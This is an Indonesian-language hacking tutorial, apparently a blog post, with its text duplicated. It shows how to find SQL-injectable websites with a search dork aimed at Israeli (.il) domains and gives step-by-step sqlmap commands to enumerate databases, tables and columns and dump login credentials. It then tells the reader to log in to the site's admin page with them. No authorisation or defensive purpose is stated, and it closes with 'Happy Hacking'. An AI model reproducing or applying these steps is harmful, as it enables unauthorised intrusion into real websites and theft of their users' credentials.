Ok langsung saja download bahan-bahanya
1. Active Python
2. Python 2.7.5
3. SQL Map
Langkah >
- Instal Python 2.7.5 sampai selesai
- Instal Active Python sampai selesai dan restart
- Ekstrak file SQL Map di Drive C
Selanjutnya kita cari target dengan Dork " inurl:id= intext:"error in your sql syntax" + site:.il
Setelah dapat target lalu kita masuk ke CMD dan ketikan perintah
cd\ > enter
cd sqlmap > enter
setelah itu ketikkan sqlmap.py -u ( utl target ) --current-db > enter
Tunggu sampai scaning pencarian database selesai.
kalau vuln pasti ketemu database nya
setelah ketemu database nya kemudian ketikan perintah
sqlmap.py -u (url target ) --tables -D ( nama database)
Note: -- tables ( untuk mencari table pada database)
- D ( nama database )
Tuh dah ketemu table nya,,dan cari table yang mengacu pada user loginya
Lalu ketikan perintah sqlmap.py -u ( url target ) --columns -T ( nama table ) - D ( nama database)
Tunggu sampai proses pencarian columns selesai.
setelah colum ketemu maka tampilan columns seperti gambar.
Kemudian ketik perintah sqlmap.py -u ( url target ) --dump -C (nama column ) -T ( nama table ) -D ( nama database )
Tunggu sampai selesai. jika selesai pencarian akan seperti gambar
Setelah itu tinggal mencari halaman admin loginya dan login dengan username dan password yang kamu dapat tadi.
Sekian dari saya Backdoor Sakit Hati ( 1mp4ct_404 )
Happy Hacking
SQLMAP
1. Active Python
2. Python 2.7.5
3. SQL Map
Langkah >
- Instal Python 2.7.5 sampai selesai
- Instal Active Python sampai selesai dan restart
- Ekstrak file SQL Map di Drive C
Selanjutnya kita cari target dengan Dork " inurl:id= intext:"error in your sql syntax" + site:.il
Setelah dapat target lalu kita masuk ke CMD dan ketikan perintah
cd\ > enter
cd sqlmap > enter
setelah itu ketikkan sqlmap.py -u ( utl target ) --current-db > enter
Tunggu sampai scaning pencarian database selesai.
kalau vuln pasti ketemu database nya
setelah ketemu database nya kemudian ketikan perintah
sqlmap.py -u (url target ) --tables -D ( nama database)
Note: -- tables ( untuk mencari table pada database)
- D ( nama database )
Tuh dah ketemu table nya,,dan cari table yang mengacu pada user loginya
Lalu ketikan perintah sqlmap.py -u ( url target ) --columns -T ( nama table ) - D ( nama database)
Tunggu sampai proses pencarian columns selesai.
setelah colum ketemu maka tampilan columns seperti gambar.
Kemudian ketik perintah sqlmap.py -u ( url target ) --dump -C (nama column ) -T ( nama table ) -D ( nama database )
Tunggu sampai selesai. jika selesai pencarian akan seperti gambar
Setelah itu tinggal mencari halaman admin loginya dan login dengan username dan password yang kamu dapat tadi.
Sekian dari saya Backdoor Sakit Hati ( 1mp4ct_404 )
Happy Hacking